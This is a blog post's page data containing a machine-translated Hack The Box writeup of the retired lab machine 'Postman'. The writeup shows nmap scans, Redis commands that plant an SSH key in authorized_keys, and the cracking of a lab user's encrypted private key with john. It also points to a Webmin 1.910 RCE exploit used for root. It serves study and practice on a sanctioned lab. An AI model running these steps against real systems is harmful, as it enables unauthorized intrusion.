{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-postman-en","result":{"data":{"markdownRemark":{"id":"2fed0608-e99d-5101-8f23-298f2a87b5e7","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-postman\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<img src=\"http://www.hackthebox.eu/badge/image/327080\" alt=\"Hack The Box\">\n<p>This time I am writing up the retired HackTheBox machine “Postman”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" 
focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#getting-a-user\">Getting a User</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with a port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Point the $RHOST entry in /etc/hosts at the target (double quotes so $RHOST expands)</span>\n<span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">\"s/^[0-9].*<span class=\"token variable\">$RHOST</span>/10.10.10.160  <span class=\"token variable\">$RHOST</span>/g\"</span> /etc/hosts\nnmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n<span class=\"token comment\"># All ports</span>\nnmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span 
class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p><code class=\"language-text\">MiniServ 1.910</code> was an application I had never seen before.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT      STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp    <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.6p1 Ubuntu 4ubuntu0.3 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">46</span>:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp    <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.29 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Ubuntu<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: The Cyber Geek<span class=\"token string\">'s Personal Website\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n10000/tcp open  http    MiniServ 1.910 (Webmin httpd)\n|_http-title: Site 
doesn'</span>t have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">Charset</span><span class=\"token operator\">=</span>iso-8859-1<span class=\"token punctuation\">)</span>.\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>Connecting to port 80 brought up what looked like a blog site.</p>\n<p><img src=\"/static/94b5d500cb0fa8bf9c3d9f2544316617/d9199/image-20220809001108449.png\" alt=\"image-20220809001108449\"></p>\n<p>I checked the page source but found nothing particularly interesting, and gobuster did not turn up any useful paths either.</p>\n<p>On the other hand, Webmin 1.910 on port 10000 appeared to have an RCE vulnerability.</p>\n<p>However, exploiting this vulnerability required credentials, so I needed to find those first.</p>\n<p>Reference: <a href=\"https://github.com/roughiz/Webmin-1.910-Exploit-Script/blob/master/webmin_exploit.py\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Webmin-1.910-Exploit-Script/webmin_exploit.py at master · roughiz/Webmin-1.910-Exploit-Script · GitHub</a></p>\n<p>Accessing Webmin required the hostname <code class=\"language-text\">postman:10000</code>, so I updated the hosts file accordingly.</p>\n<p><img src=\"/static/079ee6dad0103788e2ee2afa75d60eb4/38124/image-20220809003007010.png\" alt=\"image-20220809003007010\"></p>\n<p>I got somewhat stuck here, but a more detailed port scan revealed that port 6379 was also open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token number\">6379</span>/tcp  <span class=\"token function\">open</span>  redis   Redis key-value store <span class=\"token number\">4.0</span>.9</code></pre></div>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">6379 - Pentesting Redis - HackTricks</a></p>\n<p>Following that reference, I tried various approaches including reverse shells and file injection, but none of them worked 
cleanly.</p>\n<p>However, I ultimately succeeded in obtaining an SSH shell using the following commands:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token punctuation\">(</span>echo -e <span class=\"token string\">\"<span class=\"token entity\" title=\"\\n\">\\n</span><span class=\"token entity\" title=\"\\n\">\\n</span>\"</span><span class=\"token punctuation\">;</span> <span class=\"token function\">cat</span> id_rsa.pub<span class=\"token punctuation\">;</span> <span class=\"token builtin class-name\">echo</span> -e <span class=\"token string\">\"<span class=\"token entity\" title=\"\\n\">\\n</span><span class=\"token entity\" title=\"\\n\">\\n</span>\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> temp.txt\n<span class=\"token function\">cat</span> temp.txt <span class=\"token operator\">|</span> redis-cli -h <span class=\"token number\">10.10</span>.10.160 -x <span class=\"token builtin class-name\">set</span> ssh_key\nredis-cli -h <span class=\"token number\">10.10</span>.10.160\nconfig <span class=\"token builtin class-name\">set</span> <span class=\"token function\">dir</span> /var/lib/redis/.ssh\nconfig <span class=\"token builtin class-name\">set</span> dbfilename <span class=\"token string\">\"authorized_keys\"</span>\nsave</code></pre></div>\n<p><img src=\"/static/ac2fcc6c6aec195646dc4be47fdb1adc/5b4a1/image-20220809232943949.png\" alt=\"image-20220809232943949\"></p>\n<h2 id=\"getting-a-user\" style=\"position:relative;\"><a href=\"#getting-a-user\" aria-label=\"getting a user permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" 
height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Getting a User</h2>\n<p>With a shell obtained as the redis user, I next aimed to get the User flag.</p>\n<p>The username turned out to be Matt.</p>\n<p><img src=\"/static/5ef93dc323e438d456dbaed456a00191/6114d/image-20220809233022889.png\" alt=\"image-20220809233022889\"></p>\n<p>Checking the shell history showed various operations being performed under Matt’s account.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">redis@Postman:~$ <span class=\"token function\">history</span>\n    <span class=\"token number\">1</span>  <span class=\"token builtin class-name\">exit</span>\n    <span class=\"token number\">2</span>  <span class=\"token function\">su</span> Matt\n    <span class=\"token number\">3</span>  <span class=\"token builtin class-name\">pwd</span>\n    <span class=\"token number\">4</span>  <span class=\"token function\">nano</span> scan.py\n    <span class=\"token number\">5</span>  python scan.py\n    <span class=\"token number\">6</span>  <span class=\"token function\">nano</span> scan.py\n    <span class=\"token number\">7</span>  <span class=\"token function\">clear</span>\n    <span class=\"token number\">8</span>  <span class=\"token function\">nano</span> scan.py\n    <span class=\"token number\">9</span>  <span class=\"token function\">clear</span>\n   <span class=\"token number\">10</span>  python scan.py\n   <span class=\"token number\">11</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">12</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">13</span>  <span class=\"token function\">cat</span> /etc/ssh/sshd_config \n   <span 
class=\"token number\">14</span>  <span class=\"token function\">su</span> Matt\n   <span class=\"token number\">15</span>  <span class=\"token function\">clear</span>\n   <span class=\"token number\">16</span>  <span class=\"token builtin class-name\">cd</span> /var/lib/redis\n   <span class=\"token number\">17</span>  <span class=\"token function\">su</span> Matt\n   <span class=\"token number\">18</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">19</span>  <span class=\"token function\">cat</span> id_rsa.bak \n   <span class=\"token number\">20</span>  <span class=\"token function\">ls</span> -la\n   <span class=\"token number\">21</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">22</span>  <span class=\"token function\">cat</span> id_rsa.bak \n   <span class=\"token number\">23</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">24</span>  <span class=\"token function\">ls</span> -la\n   <span class=\"token number\">25</span>  <span class=\"token function\">crontab</span> -l\n   <span class=\"token number\">26</span>  systemctl <span class=\"token builtin class-name\">enable</span> redis-server\n   <span class=\"token number\">27</span>  redis-server\n   <span class=\"token number\">28</span>  <span class=\"token function\">ifconfig</span>\n   <span class=\"token number\">29</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">30</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">31</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">32</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">33</span>  <span class=\"token function\">netstat</span> -a <span class=\"token operator\">></span> txt\n   <span class=\"token number\">34</span>  <span class=\"token builtin 
class-name\">exit</span>\n   <span class=\"token number\">35</span>  <span class=\"token function\">crontab</span> -l\n   <span class=\"token number\">36</span>  <span class=\"token builtin class-name\">cd</span> ~/\n   <span class=\"token number\">37</span>  <span class=\"token function\">ls</span>\n   <span class=\"token number\">38</span>  <span class=\"token function\">nano</span> <span class=\"token number\">6379</span>\n   <span class=\"token number\">39</span>  <span class=\"token builtin class-name\">exit</span></code></pre></div>\n<p>There are various things worth investigating, but first I looked at <code class=\"language-text\">id_rsa.bak</code>.</p>\n<p>Opening the file revealed an encrypted private key.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">-----BEGIN RSA PRIVATE KEY-----\nProc-Type: <span class=\"token number\">4</span>,ENCRYPTED\nDEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C\n\nJehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX\ncwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2\n7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6\ncdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9\n1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv\nEyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP\nUH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY\nSj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK\nt+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS\n5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke\nP2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6\njKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge\nSbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i\nl3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X\n0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p\nS9k3li+rYr6f3ma/ULsUnKiZls8Sp
U+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR\nhkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+\nZxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V\nXTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD\nb6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi\nWhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh\nKTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm\nnpAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ\nVcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W\nX+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw<span class=\"token operator\">==</span>\n-----END RSA PRIVATE KEY-----</code></pre></div>\n<p>If I could recover a password from somewhere on the machine, I might be able to decrypt it.</p>\n<p>I got stuck here, so I ran linpeas, but that did not reveal anything useful either, so I decided to brute-force the key's passphrase.</p>\n<p>I cracked the passphrase using the following commands:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Crack the SSH key</span>\n$ python /usr/share/john/ssh2john.py id_rsa.txt <span class=\"token operator\">></span> id.hash\n$ john id.hash -wordlist<span class=\"token operator\">=</span>/usr/share/wordlists/rockyou.txt</code></pre></div>\n<p><img src=\"/static/1467c3cffaffa38ffe14b7cb2d20c692/ace37/image-20220810210351540.png\" alt=\"image-20220810210351540\"></p>\n<p>I decrypted the RSA key using the recovered passphrase, but attempting to use it for SSH still failed for some reason.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ openssl rsa -in encrypted -out decrypted</code></pre></div>\n<p>In the end, I used the 
SSH shell I had already obtained as redis and ran <code class=\"language-text\">su Matt</code> with the cracked password to get the User flag.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>After getting Matt’s shell, checking the history showed a wide range of commands that had been executed.</p>\n<p>I started by running linpeas with Matt’s privileges, but nothing obviously useful for privilege escalation turned up.</p>\n<p>Next, on a hunch, I tried logging into Webmin with the username Matt and the same password, and it worked.</p>\n<p>The version was 1.910.</p>\n<p><img src=\"/static/30a1d6a8fed3d32beceabc0d2b9812e3/d9199/image-20220810232032044.png\" alt=\"image-20220810232032044\"></p>\n<p>Looking at the linpeas output more carefully, I found that Webmin was running as root.</p>\n<p>I also confirmed that Webmin 1.910 is vulnerable to an RCE exploit that can be used when credentials are known.</p>\n<p>Reference: <a href=\"https://github.com/roughiz/Webmin-1.910-Exploit-Script\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">GitHub - roughiz/Webmin-1.910-Exploit-Script: Webmin 1.910 - Remote Code Execution Using Python Script</a></p>\n<p>I modified that exploit slightly and ran it, which successfully gave me a root 
shell.</p>\n<p>Done!!</p>","fields":{"slug":"/hackthebox-linux-postman-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-09","description":"A writeup of the retired HackTheBox machine 'Postman'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Postman (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-postman-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}